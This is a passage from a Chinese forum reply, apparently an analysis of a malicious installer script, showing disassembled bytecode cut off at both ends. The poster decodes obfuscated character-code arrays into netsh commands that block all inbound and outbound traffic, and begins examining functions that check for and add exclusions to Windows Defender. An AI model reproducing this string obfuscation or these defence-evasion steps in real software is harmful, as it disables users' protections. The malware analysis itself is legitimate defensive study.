- 移动版

回帖：], S32(108)assign Var9[35], S32(108)assign Var9[36], S32(112)assign Var9[37], S32(111)assign Var9[38], S32(108)assign Var9[39], S32(105)assign Var9[40], S32(99)assign Var9[41], S32(121)assign Var9[42], S32(32)assign Var9[43], S32(98)assign Var9[44], S32(108)assign Var9[45], S32(111)assign Var9[46], S32(99)assign Var9[47], S32(107)assign Var9[48], S32(105)assign Var9[49], S32(110)assign Var9[50], S32(98)assign Var9[51], S32(111)assign Var9[52], S32(117)assign Var9[53], S32(110)assign Var9[54], S32(100)assign Var9[55], S32(44)assign Var9[56], S32(98)assign Var9[57], S32(108)assign Var9[58], S32(111)assign Var9[59], S32(99)assign Var9[60], S32(107)assign Var9[61], S32(111)assign Var9[62], S32(117)assign Var9[63], S32(116)assign Var9[64], S32(98)assign Var9[65], S32(111)assign Var9[66], S32(117)assign Var9[67], S32(110)assign Var9[68], S32(100)assign Var8, Var9pop ; StackCount = 8pushvar Var7 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype UnicodeString_2 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype S32 ; StackCount = 11assign Var11, S32(5)pushvar Var10 ; StackCount = 12call SETARRAYLENGTHpop ; StackCount = 11pop ; StackCount = 10assign Var10[0], S32(110)assign Var10[1], S32(101)assign Var10[2], S32(116)assign Var10[3], S32(115)assign Var10[4], S32(104)assign Var9, Var10pop ; StackCount = 9pushvar Var8 ; StackCount = 10call STRFROMCODEpop ; StackCount = 9pop ; StackCount = 8pushvar Var2 ; StackCount = 9call EXECpop ; StackCount = 8pop ; StackCount = 7pop ; StackCount = 6pop ; StackCount = 5pop ; StackCount = 4pop ; StackCount = 3pop ; StackCount = 2pop ; StackCount = 1ret

这个函数包含两个ASCII码数组，用于构建命令字符串。

以下是所有数组的ASCII码还原结果及其对应的字符串：

第一个数组（36字节）ASCII码：97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 115, 116, 97, 116, 101, 32, 111, 110字符串："advfirewall set allprofiles state on"

第二个数组（5字节）ASCII码：110, 101, 116, 115, 104字符串："netsh"

第三个数组（69字节）ASCII码：97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 102, 105, 114, 101, 119, 97, 108, 108, 112, 111, 108, 105, 99, 121, 32, 98, 108, 111, 99, 107, 105, 110, 98, 111, 117, 110, 100, 44, 98, 108, 111, 99, 107, 111, 117, 116, 98, 111, 117, 110, 100字符串："advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound"

第四个数组（5字节）ASCII码：110, 101, 116, 115, 104字符串："netsh"

这个函数通过执行两个netsh命令来配置Windows防火墙：启用所有防火墙配置文件：netsh advfirewall set allprofiles state on阻止所有入站和出站连接：netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound

作用：打开Windows防火墙，并设置防火墙策略为阻止所有入站和出站连接。

针对Windows Defender还有"ISDEFENDERRUNNING"函数和"ADDDEFENDEREXCLUSION"函数，我们来看一下。先看"ISDEFENDERRUNNING"函数：复制代码隐藏代码.function(export) BOOLEAN ISDEFENDERRUNNING()pushtype Variant ; StackCount = 1pushtype Variant ; StackCount = 2pushtype Variant ; StackCount = 3pushtype UnicodeString_2 ; StackCount = 4pushtype UnicodeString_2 ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype UnicodeString_2 ; StackCount = 7assign RetVal, BOOLEAN(0)starteh null, loc_b35, null, loc_b43pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(26)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(87)assign Var9[1], S32(66)assign Var9[2], S32(69)assign Var9[3], S32(77)assign Var9[4], S32(83)assign Var9[5], S32(99)assign Var9[6], S32(114)assign Var9[7], S32(105)assign Var9[8], S32(112)assign Var9[9], S32(116)assign Var9[10], S32(105)assign Var9[11], S32(110)assign Var9[12], S32(103)assign Var9[13], S32(46)assign Var9[14], S32(83)assign Var9[15], S32(87)assign Var9[16], S32(66)assign Var9[17], S32(69)assign Var9[18], S32(77)assign Var9[19], S32(76)assign Var9[20], S32(111)assign Var9[21], S32(99)assign Var9[22], S32(97)assign Var9[23], S32(116)assign Var9[24], S32(111)assign Var9[25], S32(114)assign Var8, Var9pop ; StackCount = 8pushvar Var4 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype WideString ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(4)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(114)assign Var11[1], S32(111)assign Var11[2], S32(111)assign Var11[3], S32(116)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(1)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(92)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(5)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(99)assign Var11[1], S32(105)assign Var11[2], S32(109)assign Var11[3], S32(118)assign Var11[4], S32(50)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackC

z3960回帖于2026-02-21 07:50

下一楼›：来看看看(huwg)

查看全部回帖(7)

«返回主帖